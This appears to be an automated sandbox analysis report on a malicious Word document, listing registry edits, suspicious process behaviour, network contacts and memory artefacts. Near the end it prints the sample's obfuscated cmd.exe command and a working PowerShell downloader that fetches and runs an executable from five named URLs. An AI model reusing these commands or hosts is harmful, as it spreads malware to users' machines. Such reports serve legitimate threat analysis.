Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\cmd.exe

cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ ^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.fairfundskenya.com udp
US 8.8.8.8:53 www.trainifique.ro udp
US 185.199.111.153:80 www.trainifique.ro tcp
US 8.8.8.8:53 trainifique.ro udp
US 185.199.110.153:443 trainifique.ro tcp
US 185.199.110.153:443 trainifique.ro tcp
US 8.8.8.8:53 www.photostand.de udp
DE 81.169.145.165:80 www.photostand.de tcp
DE 81.169.145.165:443 www.photostand.de tcp
DE 81.169.145.165:443 www.photostand.de tcp
US 8.8.8.8:53 abdullahsheikh.info udp
US 8.8.8.8:53 lamsanviet.com udp
IN 193.203.163.237:80 lamsanviet.com tcp
IN 193.203.163.237:443 lamsanviet.com tcp
IN 193.203.163.237:443 lamsanviet.com tcp

Files

memory/2852-0-0x000000002FF41000-0x000000002FF42000-memory.dmp

memory/2852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2852-2-0x000000007126D000-0x0000000071278000-memory.dmp

memory/2852-7-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-19-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-18-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-124-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-112-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-100-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-87-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-75-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-62-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-31-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-27-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-17-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-15-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-14-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-13-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-12-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-11-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-10-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-9-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-6-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-131-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-59-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-51-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-16-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-8-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-139-0x000000007126D000-0x0000000071278000-memory.dmp

memory/2852-140-0x00000000007E0000-0x00000000008E0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 f12a471b7b2639f1e13bc02a74e8c0ac
SHA1 ec0fbd1646708eb37027cdf4fa6dc04143f4a6e0
SHA256 90766f139ea4a8e9d5cdd7f9dd028eb7cf88cb8fb755f5e6da57dd06281c1380
SHA512 d7c98e22377ab96be371f5a162c2ab35afc153f3651b8534c1f618b9bcbdcb7e7da0cce94545f8262d68ab70c163769ec2d6ff69ffd7585da1655944c876e901

memory/2852-156-0x000000007126D000-0x0000000071278000-memory.dmp